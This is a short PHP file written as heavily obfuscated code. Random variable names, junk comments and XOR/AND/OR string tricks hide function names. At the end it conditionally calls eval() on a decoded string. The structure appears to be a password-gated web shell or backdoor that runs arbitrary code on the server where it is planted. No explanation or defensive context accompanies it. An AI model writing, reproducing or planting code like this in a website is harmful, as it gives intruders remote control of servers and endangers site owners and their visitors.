<?php
$nbYbs7O5E='Sl95tq4K'&~Dn6;$fnQutK=lgvw.'~{y|uy~'&'nwv}~sy}u{~';$dtliWFhFL='%7}'&',7x';/*'.
           '.(jh*/$Bsi='g!v{'.tXij.'-u60"nP%,?vk>})6=:<<,e[c'^"5".S9D0n."^2N*"./*qexf4lCy'.
           '[5?Ja,CA*/icm97Qdf54gUJPVXbRZ4.")5";$gQpCU5U='?b|'^v11;$_KVl=omwe.'~w'&#jmkfN'.
           'ow|wow';$qVfQrJnFZ2Q='&At&nd'|"A,Te*V";$BRdI='^u'&"h^";$jx82nVZV='{'^'/';'Mk7'.
           '5XWDFQW';$Zt8Khb='.'^'~';$AUyNUL0UY='3h'^'l)';$A5wo2vBg=$fnQutK&(#wHRlP_M7t26'.
           'l%fdM+*5cdl'|'0P4!cS@TNM"');$DB=$gQpCU5U^$dtliWFhFL;$GaB=$_KVl&/*iqZ_AroqLt0a'.
           ']6g%X9|*/$qVfQrJnFZ2Q;$C6lYzUPE=$Bsi^('mV-^&'.VWmq.'>?={'.vWmokrnzOw.#ECPKVHm'.
           '^rW?'.yNzsw&'en9^2}}}[~~5|7RM*j"'.njLUw_x.'?'.YohGf);$IGVcBc=(';7:'.j3bn.'*el'.
           '$}x|&$h/7 &'.tj57uz.'--!y5'^'scn*j*5k%;d<:>'.gd7ntcb4.'>`{40jxa;p')|(qpFXG.'['.
           ''.M_TNUM.'^'.OavycgQAPVnOD.'~'.IEC_E&'FU|'.woXMUQ_NEuCKX_Q.'[go~|'./*TZpWFIHv'.
           'GqY&8*/JhrNwfEGm);if(!$A5wo2vBg($DB($GaB($BRdI.$jx82nVZV.$Zt8Khb./*Ahk8yPvoqP'.
           'c56*/$AUyNUL0UY)),$C6lYzUPE))eval($GaB($IGVcBc));#z:LO}Hn{u{kLRX?~FYR*8G]*u?'.
           'PBcRtXJQE+u nNhQGB4u^d?TGdSW,WCahttU=-E$LT';